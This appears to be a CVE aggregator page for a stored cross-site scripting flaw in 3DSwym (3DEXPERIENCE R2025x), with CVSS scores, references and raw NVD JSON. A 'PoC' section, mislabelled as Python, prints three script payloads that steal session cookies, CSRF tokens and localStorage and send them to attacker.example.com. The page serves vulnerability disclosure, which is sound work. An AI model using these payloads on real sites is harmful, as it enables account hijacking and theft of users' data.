CVE-2025-10552

Description

A stored Cross-site Scripting (XSS) vulnerability affecting 3DSwym in 3DSwymer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:3ds:3dswymer:r2025x:*:*:*:*:*:*:* - VULNERABLE

3DSwym in 3DSwymer on 3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Stored XSS PoC for CVE-2025-10552 - 3DSwym in 3DEXPERIENCE R2025x -->
<!-- Attacker injects the following payload into a 3DSwym post/comment/wiki field -->

<script>
    // Steal session cookie and exfiltrate to attacker-controlled server
    var sessionToken = document.cookie;
    var csrfToken = document.querySelector('meta[name="_csrf"]') ? document.querySelector('meta[name="_csrf"]').content : '';
    var img = new Image();
    img.src = 'https://attacker.example.com/steal?cookie=' + encodeURIComponent(sessionToken) + '&csrf=' + encodeURIComponent(csrfToken);
</script>

<!-- Alternative payload using event handler to bypass basic sanitization -->
<svg onload="fetch('https://attacker.example.com/exfil',{method:'POST',body:JSON.stringify({cookies:document.cookie,url:location.href,local:localStorage})})">
</svg>

<!-- Alternative payload using img tag with onerror -->
<img src=x onerror="var x=new XMLHttpRequest();x.open('GET','https://attacker.example.com/log?d='+btoa(document.cookie));x.send();">

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10552
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10552
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10552/
[4] VulDB https://vuldb.com/cve/CVE-2025-10552
[5] https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10552

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10552", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:38.010", "lastModified": "2025-12-04T21:40:26.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-site Scripting (XSS) vulnerability affecting 3DSwym in 3DSwymer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:3ds:3dswymer:r2025x:*:*:*:*:*:*:*", "matchCriteriaId": "DD893EE8-77E1-4790-832D-5AAAB1E8A7F9"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10552", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}